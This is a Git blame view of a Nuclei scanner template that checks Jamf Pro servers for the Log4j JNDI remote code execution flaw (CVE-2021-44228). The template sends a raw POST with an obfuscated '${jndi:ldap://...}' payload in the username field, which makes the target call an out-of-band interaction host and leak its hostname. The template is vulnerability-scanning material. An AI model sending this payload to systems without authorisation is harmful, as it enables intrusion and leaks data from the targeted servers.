daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml

73 lines
2.4 KiB
YAML
Raw Normal View History

Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
id: jamf-pro-log4j-rce
info:
name: JamF Pro - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK,pdteam
severity: critical
description: |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
reference:
- https://github.com/random-robbie/jamf-log4j
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
- https://community.connection.com/what-is-jamf/
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
fix-conflict
2022-10-25 13:40:49 +00:00
cwe-id: CWE-77
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
metadata:
Added max request counter of each template
2023-04-28 08:11:21 +00:00
max-request: 1
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
shodan-query: title:"Jamf Pro"
boolean format update
2023-06-04 08:13:42 +00:00
verified: true
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
updated log4j
2023-05-03 17:51:44 +00:00
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
payload update
2023-05-08 05:37:00 +00:00
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
matchers-condition: and
matchers:
- type: word
vulnerabilities enrichment
2023-07-16 13:32:52 +00:00
part: interactsh_protocol # Confirms the DNS Interaction
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
words:
- "dns"
- type: word
part: body
words:
- "<title>Jamf Pro Login</title>"
updated log4j
2023-05-03 17:51:44 +00:00
- type: regex
part: interactsh_request
regex:
vulnerabilities enrichment
2023-07-16 13:32:52 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
updated log4j
2023-05-03 17:51:44 +00:00
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
extractors:
payload update
2023-05-08 05:37:00 +00:00
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
group: 2
regex:
vulnerabilities enrichment
2023-07-16 13:32:52 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
part: interactsh_request
payload update
2023-05-08 05:37:00 +00:00
Create jamf-pro-log4j-rce.yaml
2022-10-21 08:29:33 +00:00
- type: regex
group: 1
regex:
vulnerabilities enrichment
2023-07-16 13:32:52 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request